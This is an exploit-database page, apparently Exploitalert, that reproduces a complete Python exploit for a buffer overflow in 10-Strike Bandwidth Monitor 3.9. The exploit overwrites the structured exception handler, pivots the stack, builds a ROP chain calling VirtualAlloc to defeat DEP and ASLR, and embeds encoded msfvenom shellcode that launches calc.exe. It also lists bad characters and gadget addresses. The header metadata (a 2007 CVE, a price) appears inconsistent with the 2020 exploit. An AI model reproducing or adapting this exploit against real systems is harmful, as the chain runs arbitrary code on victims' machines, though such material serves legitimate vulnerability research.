Advertisement






10-Strike Bandwidth Monitor 3.9 Buffer Overflow

CVE Category Price Severity
CVE-2007-1911 CWE-119 $5,000 High
Author Risk Exploitation Type Date
Anonymous Critical Remote 2020-06-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 0.0211 0.3452

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060035

Below is a copy:

10-Strike Bandwidth Monitor 3.9 Buffer Overflow
# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
#   1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
#   2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
#     - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
#   3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
#   4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
#   5. Pass execution to shellcode and PopCalc.
#   - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
#   Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
#   Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit

# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False  | True    | False |  False   | False  | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False  | False   | False |  False   | False  | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False  | True    | False |  False   | False  | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------

import struct
OS_retSled = '\x41'*400
retSled    = '\x24\x01\x06\x11'*100 #11060124  # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}

# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc

# 0014EAA0   110495EF  ....  LIBEAY32.110495EF
# 0014EAA4   1202EF02  ....  /CALL to VirtualAlloc
# 0014EAA8   0014EABC  ....  |Address = 0014EABC
# 0014EAAC   00000001  ....  |Size = 1
# 0014EAB0   00001000  ....  |AllocationType = MEM_COMMIT
# 0014EAB4   00000040  @...  \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8   110E7198  .q..  <&KERNEL32.VirtualAlloc>
# 0014EABC   110843B4  .C..  LIBEAY32.110843B4
# 0014EAC0   90909090  ....

def createRopChain():
    # rop chain generated with mona.py - www.corelan.be
    ropGadgets = [
      0x1202ef02,  # POP EBP # RETN [ssleay32.dll] 
      0x1202ef02,  # skip 4 bytes [ssleay32.dll]
      0x01215f16,  # POP EBX # RETN [BandMonitor.exe] 
      0xffffffff,  #  
      0x012175f5,  # INC EBX # RETN [BandMonitor.exe] 
      0x01056ff7,  # INC EBX # RETN [BandMonitor.exe] 
      0x011e94d4,  # POP EDX # RETN [BandMonitor.exe] 
      0xffffefff,  # Value to negate, destination value : 0x00001000
      0x01218952,  # NEG EDX # RETN [BandMonitor.exe] 
      0x011ead1b,  # DEC EDX # RETN [BandMonitor.exe] 
      0x110c5b5e,  # POP ECX # RETN [LIBEAY32.dll] 
      0xffffffff,  #  
      0x11016023,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1202fe55,  # POP EDI # RETN [ssleay32.dll] 
      0x01225803,  # RETN (ROP NOP) [BandMonitor.exe]
      0x1105ed16,  # POP ESI # RETN [LIBEAY32.dll] 
      0x110495ef,  # JMP [EAX] [LIBEAY32.dll]
      0x012126f5,  # POP EAX # RETN [BandMonitor.exe] 
      0x110e7198,  # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
      0x110762c4,  # PUSHAD # RETN [LIBEAY32.dll] 
      0x110843b4,  # ptr to 'push esp # ret ' [LIBEAY32.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
nopSled  = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode =  b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"

OS_nSEH    = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH       = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH        = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
extra      = '\x44'*2000
buffer  = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File    = 'poc.txt'
try:
    payload   = buffer
    f         = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum